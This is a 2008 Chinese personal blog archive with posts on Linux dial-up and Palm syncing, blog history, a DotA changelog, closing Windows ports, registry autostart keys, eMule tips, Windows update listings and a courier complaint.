2008年12月31日星期三

linux下通过Palm手机拨号上网

本文转自吹友吧:http://www.treo.net.cn/bbs/thread-90811-1-2.html


0、以下操作均在root用户下,我用的手机是treo680,装好软件usbmodem,在手机上运行usbmodem
1、安装wvdial,我用的是debian,apt-get install wvdial ppp
2、运行wvdial,会生成/etc/wvdial.conf,按你的实际情况修改一下,网上都有,现付上我用的。
[Dialer Defaults]
Init1 = at+cgdcont=1,"ip","cmwap"
stupid Mode = yes
Modem Type = USB Modem
ISDN = 0
Phone = *99***1#
Modem = /dev/ttyACM0
Username = any
Carrier Check = no
Password = any
Baud = 460800
New PPPD = yes
3、运行wvdial,已经能拨号上网了,但现在有一个问题,就是每2分钟就掉线,解决的方法是
4、读/etc/ppp/options其中有两行:
# If this option is given, pppd will send an LCP echo-request frame to the
# peer every n seconds. Normally the peer should respond to the echo-request
# by sending an echo-reply. This option can be used with the
# lcp-echo-failure option to detect that the peer is no longer connected.
lcp-echo-interval 30

# If this option is given, pppd will presume the peer to be dead if n
# LCP echo-requests are sent without receiving a valid LCP echo-reply.
# If this happens, pppd will terminate the connection. Use of this
# option requires a non-zero value for the lcp-echo-interval parameter.
# This option can be used to enable pppd to terminate after the physical
# connection has been broken (e.g., the modem has hung up) in
# situations where no hardware modem control lines are available.
lcp-echo-failure 4
明白为什么是2分钟就掉线了吧,把那两项注释掉,再拨号上网就没问题了。
5、上网与ie一样,要加代理10.0.0.172:80,debian的apt-get 更新,也要加代理,
在/etc/apt/下添加文件apt.conf,内容:
Acquire::http:roxy "http://10.0.0.172:80";
不要忘了最后的分号。
发帖者 时间: 没有评论:
标签: ,

Ubuntu下同步Palm

ana:我在网上找到一篇Ubuntu下同步palm的文章你参考一下
Palm只提供了windows平台的客户端,在linux下,在经过一些配置后,同样可以对palm设备进行管理。

本文档在Ubuntu8.04、Palm Centro(Palm OS 5)环境下测试通过。

Ubuntu的源中可以找到Pilot、Kpilot、Jpilot等多种工具,其中Jpilot对新设备的支持比较好,推荐使用。

当palm通过usb接入计算机后,linux的日志会记录下usb接口的信息,
通过这个命令查看:
$dmesg

在标准的ubuntu下,会看到这样的信息:
Jul 21 08:34:43 laptop kernel: [31222.449600] usb 2-2: new full speed USB device using uhci_hcd and address 3
Jul 21 08:34:43 laptop kernel: [31222.623557] usb 2-2: configuration #1 chosen from 1 choice
Jul 21 08:34:54 laptop kernel: [31232.920043] usb 2-2: USB disconnect, address 3

这表示系统可以看到usb设备,但是无法识别是什么设备。

让ubuntu与设备通讯:
$sudo /sbin/modprobe usbserial
$sudo /sbin/modprobe visor

再查看一下日志,会看到新的信息
Jul 21 08:37:27 laptop kernel: [31385.682799] usb 2-2: USB disconnect, address 5
Jul 21 08:37:27 laptop kernel: [31385.683606] visor ttyUSB0: Handspring Visor / Palm OS converter now disconnected from ttyUSB0
Jul 21 08:37:27 laptop kernel: [31385.683751] visor ttyUSB1: Handspring Visor / Palm OS converter now disconnected from ttyUSB1

也可以通过lsmod检查ubuntu是否识别了新设备:
$ sudo /sbin/lsmod | grep visor
visor 20364 0
usbserial 32488 1 visor
usbcore 134280 9 visor,usbserial,usbhid,ndiswrapper,usb_storage,lib usual,ehci_hcd,uhci_hcd

让系统可以再下次引导后加载新设备
$sudo vi /etc/modprobe.d/options
添加新的一行:
options visor vendor=0×830 product=0×61

在每次挂载palm设备时创建/dev/pilot的符号链接
$sudo vi /etc/udev/rules.d/10-custom.rules
添加新的一行:
KERNEL=”ttyUSB*”, NAME=”%k”, SYMLINK=”pilot”, GROUP=”uucp”, MODE=”0666″

现在如果重新登录系统,让变更生效,在palm sync时就会创建/dev/ttyUSB0或/dev/ttyUSB1等设备链接。但此时它也许是不可写的,因此需要变更相应的权限:
$sudo vi /etc/udev/rules.d/40-permissions.rules
在#Serial devices 这一段,

KERNEL==”ttyLTM[0-9]*”, GROUP=”dialout”, MODE=”0660″
修改为
KERNEL==”ttyLTM[0-9]*”, GROUP=”dialout”, MODE=”0666″

最后再为系统启动添加设备模块
$sudo vi /etc/modules
添加两行:
usbserial
visor

重启系统——运行jpilot——安装palm用户——现在,你的palm可以跟linux交互了
发帖者 时间: 1 条评论:
标签: ,

2008年12月24日星期三

博客发展三阶段论- -

博客发展三阶段(史前阶段、初级阶段、成长阶段)
综上所述,准确地说,博客的历史与万维网(WWW,或Web)的历史一样“悠久”。最早的博客应该就是万维网的发明人蒂姆·贝纳斯—李(Tim Berners-Lee),他开设的第一个网站http://info.cern.ch(当然已经不复存在,而被当作古董保存着)实际上就是第一个博客网站,因为里面的内容就是列出所有出现在网上的各类网站。而后的1993到1996年间,NCSA和网景的“What’s New”栏目,也有着博客网站的雏形。当然,这一切我们都把它归于博客的“史前时期”,博客真正的历史可以从90年代中后期开始。

第一阶段(90年代中期到90年代末期):萌芽阶段,或者称为启蒙期。
追溯博客的源头,无疑是一件难事。有人认为1994年Justin Hall声名狼藉的“网上日记”可以算早期的博客形式,这个家伙在网上及时发布他对吸毒、做爱的赤裸裸体验,吸引了不少眼球。有人说,1998年Jesse James Garrett发表在Camworld的网络旅行日记,是点燃博客社区之火的导火索,从此博客成为一种新的潮流。但更多的人认为博客最正宗的源头还是Pyra(就是现在Blogger.com的前身),这是一家小小的软件公司,三个创始人为了开发一个复杂的“群件”产品,编写了一个小软件,以博客方式保持彼此的沟通与协同。后来,他们觉得这个简单的小工具对别人也很有用处,于是,1999年8月,就在网上免费发布了Blogger软件。而此前,算得上博客的人大概还只有几打而已。结果,这样一来,如同干柴碰上烈火,许多人利用这个软件作为武器,进入博客队伍。博客队伍开始迅速繁衍开来。Pyra也因为这个根本没有上心的小软件而名声大振。
总之,这个阶段主要是一批IT技术迷、网站设计者和新闻爱好者,不自觉、无理论体系的个人自发行为。还没有形成一定的群体,也没有具备一种现象的社会影响力。在悄悄的演变过程中,也有一些事件和人物起到了非常关键的启蒙与带头作用。为博客革命准备条件。



第二阶段(2000年——2006年左右):初级阶段,或称崛起期。
到2000年,博客开始成千上万涌现,并成为一个热门概念。在博客发展史上,911事件是一个重要的时刻。正是这场恐怖的袭击,使人们对于生命的脆弱、人与人沟通的重要、最即时最有效的信息传递方式,有了全新的认识。一个重要的博客门类:战争博客(WarBlog)因此繁荣起来,可以说对911事件最真实最生动的描述不在《纽约时报》,而在那些幸存者的博客日志中;对事情最深刻的反思与讨论,也不是出自哪一个著名记者手中,而是在诸多的普通博客当中。
据不完全统计,到今天,全世界自觉实践的博客数量,已经达到50万到100万之众。虽然与3亿以上的网民相比,还显得微不足道。但是这些博客的影响力,却早已超出了他作为个人、甚至作为自己所在行业的原有范围。开始引起主流的媒体的强烈关注,并明显感受到博客崛起对传统媒体的冲击。同时,各个专业领域的博客如“雨后春笋”,纷纷浮出水面,越来越成为该专业关注的焦点。除了美国,英国、匈牙利、德国等欧洲国家的博客也形成声势。亚洲,包括中国也开始感受到博客的脉动。估计,在最近一两年内,博客将成为互联网萧条时期最重要的新现象之一,为全社会所关注。

第三阶段(2006年—— ):成长阶段,或者称为发展期。
预测未来永远是一件很愚蠢的事情,尤其预测网络。对于博客的未来,现在要定论,的确太早!而且争议性很大。但是,根据我们的研究和判断,我们还是冒险地认同这样的一些大胆的判断:
到2006年左右,作为一种新的媒体现象,博客的影响力有可能超越传统媒体;
作为专业领域的知识传播模式,博客将成为该领域最具影响力的人物之一;
作为一种社会交流工具,博客将超越E-mail、BBS、ICQ(IM),成为人们之间更重要的沟通和交流方式。
显然,以上主要是对全球(美国为中心)博客发展阶段的简单划分。在中国,与所有的网络革命一样,继续保持着一定的“滞后度”。在博客方面也不例外,中国的发展阶段基本上差了一个阶段。也就是说,现在中国的博客发展仅仅进入启蒙期,萌芽期,可能需要2-3年,才能进入真正的初级阶段,也就是崛起期。
但是,一向对网络发展保持最密切关注的“数字论坛”成员,从2000年左右就已经开始觉察,并予以极大的关注。2002年,开始义不容辞地充当“博客思想”在中国推广和倡导的先锋。虽然给“博客”正式冠以中文名字,还是2002年刚刚完成的事情。但是在中国,最早关注、追踪并系统阐述“博客”想象的,是一直研究新媒体的孙坚华。他在98年、99年的不少文章里已经开始涉及许多博客现象,而2002年8月完成的《博客论》,是国内第一篇系统、全面阐述博客革命的文章。
资料来源:博客研究中心
发帖者 时间: 没有评论:

2008年12月23日星期二

DOTA 6.57C fix 修正版 地图下载 中文版本

下载 :thunder://QUFmdHA6Ly9mdHAudnNhLmNvbS5jbi9kaXR1aS9VcGxvYWQvd2FyM3JwZ21hcC8yMDA4MTIvRG90QSBBbGxzdGFycyB2Ni41N2MgZml4LnczeFpa/

  DotA v6.57C中文修正版更新日志 2008-12-16 23:30
  修正了更多BUG。
  DotA v6.57C更新日志
  修正了小鸡臂章BUG。
修正了火女无限点金BUG。
  DotA v6.57B更新日志
  Fixed a few critical bugs that could cause some abilities to malfunction.
  修正了一些导致游戏弹出的致命错误。
  DotA v6.57更新日志
  * 更改了-sd模式英雄的选择机制。现在三位英雄将在能量圈里以图标的方式供玩家选择。
  * 修正改进了大量关于地图语言兼容性的问题
  * 为中国玩家修正了作用于魔兽争霸三1.20e版本下的一些游戏bug
  * 大大降低了游戏的CPU占用
  * 能量圈现在有6个物品栏,拥有的物品被技能所替代,玩家不能拾取非自身购买的物品。
  * 更改了购物后物品掉落的位置。购物时如果周围没有单位,物品将出现在玩家的能量圈里
  * 降低了薄葬的冷却时间(90/70/50/30->80/60/40/20)
  * 增加打掉能量齿轮的奖励
  * 降低了发条地精的智力成长(1.7->1.3)
  * 增加了发射钩爪技能的魔法量 (125->150)
  * 增加了月蚀技能的冷却时间(140->160/150/140)
  * 现在月骑死后月蚀将不再继续释放,月光间隔从0.5秒增至0.6秒
  * 降低了风行者的三技能风行者冷却时间(65/50/35/20->30/25/20/15)
  * 降低了船长普罗德摩尔的初始智力 (18->16)
  * 降低了船长普罗德摩尔的智力成长(2.2->1.5)
  * 削弱了地图标记的持续时间(2/3/4/5秒持续时间, 60/50/40/30 cd, 115魔耗 --> 1/2/3/4秒冷却时间,30 cd,80/90/100/110魔耗)
  * 增加了船长普罗德摩尔手动地图标记的魔耗
  * 增加了船长普罗德摩尔幽灵船的魔耗(150->150/200/250)
  * 全能骑士的初始移动速度下降5
  * 增加了暗影萨满的初始力量(16->19)
  * 增加了狂热光环的作用范围 (300-500)
  * 改进了黑暗贤者的施法前摇
  * 略微增加了黑暗贤者的复制之墙持续时间
  * 降低了地卜师低级地之突袭的伤害加成(15->4/8/12/16)
  * 改进了束缚击的角度和范围
  * 略微增加了束缚击的持续时间和冷却时间(0.5, 1.4/2.1/2.8/3.5, 14 -> 0.75, 1.5/2.25/3/3.75, 10)
  * 降低了暗影萨满大招群蛇守卫的冷却时间(恒定120秒变为100/80/60秒)
  * 降低了鬼影重重分身的伤害(50%-> 40%)
  * 鬼影现在出现在对方身前后,与攻击对方之间有1秒的延迟
  * 降低了元素分离的魔耗和冷却时间
  * 增强了神灵武士的大招牺牲
  * 改进了鱼人守卫的施法前摇
  * 重做了巫毒回复术的作用机制
  * 略微增强了强化浮雕(冷却时间从6分钟减少到5分钟)
  * 小鸡现在花费200金
  * 改进了精神体的攻击类型
  * 调低了精灵狼的生命值(400/500/600/700 -> 400/475/550/625)
  * 降低了狼人和精灵狼2点的初始护甲
  * 增加了白牛技能神行太保的作用范围(300->500)
  * 命令光环的范围从300增至450
  * 增加了雷霆一击的作用范围
  * 无光之盾的生命值从100/125/150/175增加至110/140/170/200
  * 跳刀的冷却时间从15秒增加至18秒
  * 每位选手在游戏开始时就拥有一个能量圈。
  * 现在-disablehelp命令可以令队友船长的地图地标对自己无效
  * 修正了靠近天灾野区中心一些关于树林的布局问题
  * 略微调整了天灾上路的防御塔位置(往回推了一点与近卫上路相对应)
  * 你的能量圈会看起来比队友的更明显
  * 恢复了小地图以前的设置,由于不同联赛模式下的问题
  * 改进了Roshan新技能重击的数值(在上个版本中代替了投石技能)
  * 将强化浮雕从道具商人移到你的能量圈技能中,以此来防止敌军的一些滥用
  * 现在-disablehelp命令可以让光法大招对你的召唤无效
  * 加入了一些新的英雄声音到-quote命令(食人魔魔法师、哥布林工程师、兽王和熊猫酒仙),如果你随机选择英雄声音,它会告诉你编号
  * 改变了光明游侠的人物音效
  * 修正了天灾远古野区的拉野范围
  * 修正了关于多个meepo用复活盾复活的视角问题
  * 修正了记分板的消耗品计数
  * 修正了静电场伤害略高于显示数值的问题
  * 当CD正在减少时,bkb在使用后可以丢弃
  * 修正了关于-sc的文本显示
  * 修正了一个相位靴和精灵龙相位移动的bug
  * 相位靴的使用不会触发最后遗言
  * 修正了近卫下路小怪路径
  * 在dm模式中英雄无法买活
  * 修正-cm模式中,reload后,裁判记分板消失的问题
  * 修正一些在dm模式中英雄复活的相关问题(在-dm中,不是-dmap或者-dmar)
  * 显影之尘将会显示冷却时间
  * 消除了关于狂战士怒吼和丢弃物品的相关bug
  * 修正关于小鸟使用显影之尘的问题
  * 修正rd模式中 英雄选择结束后,选择区域对于天灾方显示为以探索的bug
  * 修正在正常模式中,无法从黄昏酒馆repick的问题
  * 修正关于灵能陷阱数量的问题
  * 修正在-test模式中 防御塔被击毁的相关问题
  * 修正复活盾在meepo的副体上的魔法值问题
  * 修正一些关于船长视觉效果的bug
  * 修正假腿和精气光环的bug
  * 修正一些关于熊猫分身的bug
  * 修正相位靴的相关bug
  * 跳刀在cd中无法丢弃
  * 修正关于小鸟丢弃物品和复活盾的bug
  * 修正在某些模式里面 受攻击仍然能使用跳刀的bug
  * 修正光明游侠在-sd或-ai中的出现问题
  * 修正流星雨和折射之间的问题
  * 修正关于熊猫分身圈选的问题
  * 修正光明游侠和移动命令的问题
  * 相位靴不在驱散静默诅咒
  * 修正X标记对熊猫酒仙大招元素分离造成的bug
  * 修正在-sc模式中 超级兵被卡住的bug
  * 修正一个最近发现的-courier中的bug
  * 修改了洪流的状态图标
  * 在-gameinfo里增加了-cm模式的信息
  * 修正在roshan附近可以在神秘商店买东西的问题
  * 修改了关于拉框圈选时能量圈与商店优先选择的问题
发帖者 时间: 没有评论:
标签: ,

2008年12月21日星期日

如何关闭445端口

win2000
开始-运行输入regedit.确定后定位到
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Servi ces\NetBT\Parameters,新建名为“SMBDeviceEnabled”的DWORD值,并将其设置为0

默认情况下windows有很多端口是开放的.在你上网的时候,网络病毒和黑客可以通过这些端口连上你的电脑.所以应该关闭.主要有tcp 135 ,139,445,593,1025端口和udp135,137,138,445 端口,一些流行病毒的后门端口,如tcp 2745,3127,6129端口,以及远程服务访问端口3389.

winxp/2003


1 点击 "开始菜单/设置/控制面板/管理工具",双击打开"本地策月",选中"ip安全策月,在本地计算机"右边的空白位置右击鼠标,谈出快捷菜单,选择"创建 ip安全策月",弹出向导.在向导中点击下一步下一步,当显示"安全通信请求"画面时,把"激活默认相应规则"左边的钩去掉,点"完成"就创建了一个新的ip安全策月.

2
右击该ip安全策月,在"属性"对话框中,把"使用添加向导"左边的钩去掉,然后再点击右边的"添加"按纽添加新的规则,随后弹出"新规则属性" 对话框,在画面上点击"添加"按纽,弹出ip筛选器列表窗口.在列表中,首先把"使用添加向导"左边的钩去掉,然后再点击右边的"添加"按纽添加新的筛选器.

3
进入"筛选器属性'对话框,首先看到的是寻地址,源地址选"任何ip地址",目标地址选"我的ip地址",点击"协议"选项卡,在"选择协议类型 "的下拉列表中选择“tcp",然后在"到此端口"的下的文本框中输入"135",点击确定.这样就添加了一个屏蔽tcp135 端口的筛选器,可以防止外界通过135端口连上你的电脑.
点击确定后回到筛选器列表的对话框,可以看到已经添加了一条策月.重复以上步骤继续添加tcp 137 139 445 593 端口和udp 135 139 445 端口,为它们建立相应的筛选器.
重复以上步骤添加tcp 125 2745 3127 6129 3389 端口的屏蔽策月,建立好上述端口的筛选器,最后点击确定按纽.
4
在"新规则属性"对话框中,选择"新ip筛选器列表'然后点击其左边的复选框,表示已经激活.最后点击"筛选器操作"选项卡中,把"使用添加向导 "左边的钩去掉,点击"添加"按钮,进行"阻止"操作,在"新筛选器操作属性"的"安全措施"选项卡中,选择"阻止",然后点击"确定"
5
进入"新规则属性"对话框,点击"新筛选器操作".,选取左边的复选框,表示已经激活,点击"关闭"按钮,关闭对话框.最后"新ip安全策月属性 "对话框,在"新的ip筛选器列表"左边打钩,按确定关闭对话框.在"本地安全策月"窗口,用鼠标右击新添加的ip安全策月,然后选择"指派".
重新启动后,上述端口就可以关闭了!电脑就安全多了!!!
发帖者 时间: 没有评论:
标签: , ,

2008年12月18日星期四

常用注册表启动

Windows启动时通常会有一大堆程序自动启动。不要以为管好了“开始→程序→启动”菜单就万事大吉,实际上,在Windows XP/2K中,让Windows自动启动程序的办法很多,下文告诉你最重要的两个文件夹和八个注册键。

  一、当前用户专有的启动文件夹

  这是许多应用软件自动启动的常用位置,Windows自动启动放入该文件夹的所有快捷方式。用户启动文件夹一般在:\Documents and Settings\<用户名字>\「开始」菜单\程序\启动,其中“<用户名字>”是当前登录的用户帐户名称。

  二、对所有用户有效的启动文件夹

  这是寻找自动启动程序的第二个重要位置,不管用户用什么身份登录系统,放入该文件夹的快捷方式总是自动启动——这是它与用户专有的启动文件夹的区别所 在。该文件夹一般在:\Documents and Settings\All Users\「开始」菜单\程序\启动。

  三、Load注册键

  介绍该注册键的资料不多,实际上它也能够自动启动程序。位置:HKEY_CURRENT_USER\Software\Microsoft\WindowsNT\CurrentVersion\Windows\load。

  四、Userinit注册键

  位置:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion \Winlogon\Userinit。这里也能够使系统启动时自动初始化程序。通常该注册键下面有一个userinit.exe,如图一,但这个键允许 指定用逗号分隔的多个程序,例如“userinit.exe,OSA.exe”(不含引号)。

五、Explorer\Run注册键

  和load、Userinit不同,Explorer\Run键在HKEY_CURRENT_USER和HKEY_LOCAL_MACHINE下都 有,具体位置是:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion \Policies\Explorer\Run,和HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows \CurrentVersion\Policies\Explorer\Run。

  六、RunServicesOnce注册键

  RunServicesOnce注册键用来启动服务程序,启动时间在用户登录之前,而且先于其他通过注册键启动的程序。 RunServicesOnce注册键的位置是:HKEY_CURRENT_USER\Software\Microsoft\Windows \CurrentVersion\RunServicesOnce,和HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft \Windows\CurrentVersion\RunServicesOnce。

  七、RunServices注册键

  RunServices注册键指定的程序紧接RunServicesOnce指定的程序之后运行,但两者都在用户登录之前。RunServices的 位置是:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion \RunServices,和HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows \CurrentVersion\RunServices。

  八、RunOnce\Setup注册键

  RunOnce\Setup指定了用户登录之后运行的程序,它的位置是:HKEY_CURRENT_USER\Software\Microsoft \Windows\CurrentVersion\RunOnce\Setup,和HKEY_LOCAL_MACHINE\SOFTWARE \Microsoft\Windows\CurrentVersion\RunOnce\Setup。

  九、RunOnce注册键

  安装程序通常用RunOnce键自动运行程序,它的位置在HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft \Windows\CurrentVersion\RunOnce和HKEY_CURRENT_USER\Software\Microsoft \Windows\CurrentVersion\RunOnce。HKEY_LOCAL_MACHINE下面的RunOnce键会在用户登录之后立即运 行程序,运行时机在其他Run键指定的程序之前。HKEY_CURRENT_USER下面的RunOnce键在操作系统处理其他Run键以及“启动”文件 夹的内容之后运行。如果是XP,你还需要检查一下HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows \CurrentVersion\RunOnceEx。

  十、Run注册键

   Run是自动运行程序最常用的注册键,位置在:HKEY_CURRENT_USER\Software\Microsoft\Windows \CurrentVersion\Run,和HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows \CurrentVersion\Run。HKEY_CURRENT_USER下面的Run键紧接HKEY_LOCAL_MACHINE下面的Run键运 行,但两者都在处理“启动”文件夹之前。

十一、

在注册表清除键值为 [HKEY_CURRENT_USER\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION \EXPLORER\TRAYNOTIFY]下的IconStreams和PastIconsStream(一个是记录自定义通知的,一个是记录过去项目 的删除后按F5刷新保存
然后在进程管理器里“进程”里强行中止系统核心“Explorer.exe”并点击“文件”-》“新建任务”-》重新家载“Explorer.exe”即可,开机后可以发现自定义通知干净了~保护了个人隐私~
发帖者 时间: 没有评论:
标签: ,

2008年12月17日星期三

宏观经济学考试

今天下午终于考完宏观经济学了,正常发挥,等待
发帖者 时间: 没有评论:

DOTA小鸡臂章BUG

在小鸡身上带树和臂章
让小鸡吃树 然后 路上交换臂章和树...
然后全体错误
现在都被这个折磨的很厉害...
57还有这个BUG
发帖者 时间: 没有评论:
标签: ,

2008年12月14日星期日

禁网半月,复习考试

禁网半月,到09年1月9日,除必须与网络连接时其他时间均不接触网络,用心准备,仅此一次

祝我好运
发帖者 时间: 没有评论:

如何打开DAT文件

DAT格式文件有可能是VCD格式文件,用WINDOWS MEDIA PLAYER或其他一些VCD播放软件就可以打开;
也可能是某些程序的数据文件。
数据文件有可能是ASCII编码的,那么可以用任何文本编辑软件如常用的“记事本”打开;也有可能是各种应用软件的自有格式。
如果是某种应用软件自定义的格式,那就只能在使用这个软件的过程中有该软件自动调用了,用户不能直接用常用软件来打开它。

DAT文件,可以按照扩展名来看就是DATA的意思,即数据文件,这类文件并没有进行绝对化的定义,许多程序对其有不同的解释方法,例如VCD光盘中的DAT文件就可以用一般的视频播放器打开,而QQ的DAT文件中则存储了用户信息,是无法使用常规方式打开的,只有QQ程序可以访问。还有一些其他程序都有自己对DAT文件的定义。
所以总结来说,DAT文件没有一个严格的定义。

VCD视频文件,用常用的播放器都可以打开观看

数据文件,由于各个软件有自己的格式,一般无法观看

文件如果是文本格式的.dat文件,用记事本之类的软件就可以直接打开,而且无需转换。

VCD中的.dat文件则需要用VCD播放软件打开,而且不能转换为文本文件。

某些软件的一些数据文件也是.dat扩展名,这些文件不能直接打开,也不能转换成文本文件。


不知你的DAT文件到底是用在什么地方的?VCD的文件扩展名也为DAT,有些数据文件也为DAT,其中有些是文本格式,有些不是,你想打开什么文件?不知道文件格式是没用的。

要打开一个文件首要要知道它的内部格式,而不是看他的扩展名,扩展名只是一个内部格式的提示而已


首先:文本文件和二进制文件是有区别的,对于文本文件来说,每个字节(或每几个字节)的意义相同,你只要一个一个字节的读出来就OK了;而对于二进制文件来说,可能有4个字节保存了一个整形,接下去有4个字节保存了一个浮点型等等……所以要想打开二进制文件需要了解它的文件格式。
要想知道文件格式,你可以用16进制编辑器打开一个二进制文件,然后猜测它的格式。
发帖者 时间: 没有评论:
标签:

2008年12月12日星期五

让Emule(电驴)获取更快的下载速度

作者:飘雪工作室 http://www.pxue.com/
声明:转载请保留作者及网址

1、根据下载的文件类型选择合适的服务器呆着。比如下载一部在国内非常流行的DVD大片,建议呆在华语P2P服务器上,在线的人的越多,服务器上存的共享文件源也就越多,你能获取到的连接数目也就可能越多了。

2、要学会切换服务器,当你搜索到一个文件开始下载一段时间后,源的数目基本上也就稳定了。这个时候,可以尝试着连接一下在线人数最多的服务器,以便让服务器为您再次为您提供您没有得到的源。

3、尽量地获取高ID,在Emule(电驴)中用高ID和低ID来区分外网用户和内网用户。内网连接到电驴服务器上获取的是低ID,外网用户获取到的是高ID。所谓的外网和内网区分对于电驴来讲并不是物理网络连接所决定的,通俗一点来讲就是如果ADSL用户(物理上的外网)因为使用了防火墙软件而关闭了电驴服务器用来测试的端口就会变成内网。同理,局域网用户如果在网关处设置了端口映射而让自己的端口能被电驴服务器检测并响应则就会获取到高ID而变成外网。对电驴软件来讲,低ID用户只能下载高ID用户所共享的文件,而高ID则可以下载低ID和高ID的共享,这就是为什么要获高ID的原因。

4、要学会控制上传和下载比例,以便合理地使用带宽。这里并不是鼓励光下载不上传或是光上传不载之流。光上传不下载当然是雷峰,是值得我们学习的榜样,但那并不是我们使用电驴的目的。我们使用电驴是因为我们要获取,上传是为了获取到更多的资源。所以光下载不上传是被驴友被鄙视的,也获取不到高的下载速度,也会骂电驴是一蜗牛地。太高的上传速度会导致您下载的速度变慢,太慢的上传速度会导致你上传的不够也获取不到高的下载速度。偶的经验是下载初期把上传速度加大,待下载速度达到一定程度时把上传速度给控制下来。


5、尽可能地寻找源多的文件下载。如果您下载文件实在源不多,就呆在人数最多的服务器上吧。多利用一下右键菜单里面的高级功能:把所有源交换把A4FF(可能是这个,偶这里没有电驴,又喝多了酒,记不住)。下载源少的文件,再一个就是要有点耐心,毕竟源不多呀,下载完之后也要记得多共享一会,让别人也好过一点。

6、要学会共享。下载一个文件的初期一般速度较慢且排除等待时间较长,面对几百个源却根本体会不到电驴那种传说中的高速。这个时候要有点耐心,因为你连接到的那些计算机可能以前没有从你这里下载过东西,你在他们那里没有积分所以只有排除等待这一个途径。等你下载到一些之后,共享那里面会出你当前正在下载的这个文件,可以把它的级别设置为发布,这样服务器会通知别的驴友你这里有一个发布的文件,让更多的驴友来连接你,下载你的文件,这样让你获取积分的机会更多一些,自然高速下载的机会也就多一些了。

最后祝各位都用电驴拉到自己喜爱的东西!
发帖者 时间: 没有评论:
标签:

2008年12月11日星期四

微软2008年12月安全更新程序ISO镜像

此 DVD5 ISO 映像文件中包含2008年12月9 日在 Windows Update 上发布的 Windows 安全更新程序。此映像不包含其他 Microsoft 产品的安全更新程序。此 DVD5 ISO 映像仅供那些需要下载每个安全更新程序的多个单独语言版本以及那些不使用自动解决方案(例如,Windows Server Update Services (WSUS))的管理员使用。您可以使用此 ISO 映像同时下载所有语言的多个更新程序。

注意: 在部署这些更新程序之前,请务必查看http://www.microsoft.com/technet/security上的各个安全公告,以确保文件未在更近的日期更新过。

此 DVD5 映像包含以下更新程序:
KB956802 / (MS08-071)
Windows 2000 - 24 languages
Windows Server 2003 - 18 languages
Windows Server 2003 x64 Edition - 11 languages
Windows Server 2003 for Itanium-based Systems - 4 languages
Windows XP - 24 languages
Windows XP x64 Edition - 2 languages
Windows Vista - 36 languages
Windows Vista for x64-based Systems - 36 languages
Windows Server 2008 - 19 languages
Windows Server 2008 x64 Edition - 19 languages
Windows Server 2008 for Itanium-based Systems - 4 languages
KB958623 / (MS08-075)
Windows Vista - 36 languages
Windows Vista for x64-based Systems - 36 languages
Windows Server 2008 - 19 languages
Windows Server 2008 x64 Edition - 19 languages
Windows Server 2008 for Itanium-based Systems - 4 languages
KB958624 / (MS08-075)
Windows Vista - 36 languages
Windows Vista for x64-based Systems - 36 languages
Windows Server 2008 - 19 languages
Windows Server 2008 x64 Edition - 19 languages
Windows Server 2008 for Itanium-based Systems - 4 languages
KB952068 / (MS08-076)
Windows 2000 - 24 languages
Windows Server 2003 - 18 languages
Windows Server 2003 x64 Edition - 11 languages
Windows Server 2008 - 19 languages
Windows Server 2008 x64 Edition - 19 languages
KB952069 / (MS08-076)
Windows 2000 - 24 languages
Windows Server 2003 - 18 languages
Windows Server 2003 x64 Edition - 11 languages
Windows Server 2003 for Itanium-based Systems - 4 languages
Windows XP - 24 languages
Windows XP x64 Edition - 2 languages
Windows Vista - 36 languages
Windows Vista for x64-based Systems - 36 languages
Windows Server 2008 - 19 languages
Windows Server 2008 x64 Edition - 19 languages
Windows Server 2008 for Itanium-based Systems - 4 languages
KB954600 / (MS08-076)
Windows 2000 - 24 languages
Windows Server 2003 - 18 languages
Windows Server 2003 x64 Edition - 11 languages
Windows XP - 24 languages
Windows XP x64 Edition - 2 languages

支持的操作系统:
Windows 2000 Service Pack 4; Windows Server 2003 Service Pack 1; Windows Server 2003 Service Pack 1 for Itanium-based Systems; Windows Server 2003 Service Pack 2; Windows Server 2003 Service Pack 2 for Itanium-based Systems; Windows Server 2003 Service Pack 2 x64 Edition; Windows Server 2008; Windows Vista; Windows Vista 64-bit Editions Service Pack 1; Windows Vista Business 64-bit edition; Windows Vista Enterprise 64-bit edition; Windows Vista Home Basic 64-bit edition; Windows Vista Home Premium 64-bit edition; Windows Vista Service Pack 1; Windows Vista Ultimate 64-bit edition; Windows XP Professional x64 Edition ; Windows XP Service Pack 2; Windows XP Service Pack 3

官网:http://www.microsoft.com/downloads/details.aspx?FamilyID=a72bf06d-d755...

下载:微软2008年12月安全更新程序ISO镜像

发帖者 时间: 没有评论:
标签: , ,

Windows Media Player 11 for Windows 2003 简体中文正式版

下载地址:

http://dl.onlinedown.net/down/wmp11-windows2003-x86-enu.zip
发帖者 时间: 没有评论:
标签: ,

2008年12月5日星期五

丹东韵达“快”递,强悍到让人无语

在家无聊,翻了翻丹东的网站无意看到的

原文出自丹东风云网,转载请注明出处。

人格保证以下所述为本人真实经历

本人是网购族,6年多的网购经验让我用遍了丹东所有的快递公司:顺丰的快速,申通的覆盖网络,中通的低价,宅急送的服务态度...... 都令我满意。可最近我却遇到了一个很强悍的极品“快”递——韵达。

两次使用韵达均在本月,所以可以客观反映出这家公司当前的服务状态:
第一次在月初,广东发来的包裹,整整用了7天!(以往用别家快递广东到丹东,一般是3天,快的时候2天就到)。初试韵达,花了快递的钱,享受到了邮局普包的待遇 (附件1)
第二次在月末,我忘了提醒卖家,还是发了韵达,这回有进步,6天(附件2)

其实,我并不是个矫情的人,包裹晚几天倒是无所谓,反正也不急着用,关键是昨天我给丹东韵达打电话查单,让我感受到了他们的强悍,真是“晕大”了,以下对话:

我:你好,我有个包裹5天了还没到,麻烦查一下(按理说应该问我要单号,可韵达到底是韵达,不走寻常路,连问都不问)
韵(一女的):这么长时间没到,对方肯定是没给你寄,你被骗了
我:不会吧,他24号就发了,而且把单子扫描给我了
韵:单子啊,也是假的,这东西还不容易吗,你要多少我给你多少
我:我给你单号,还是帮我查下吧
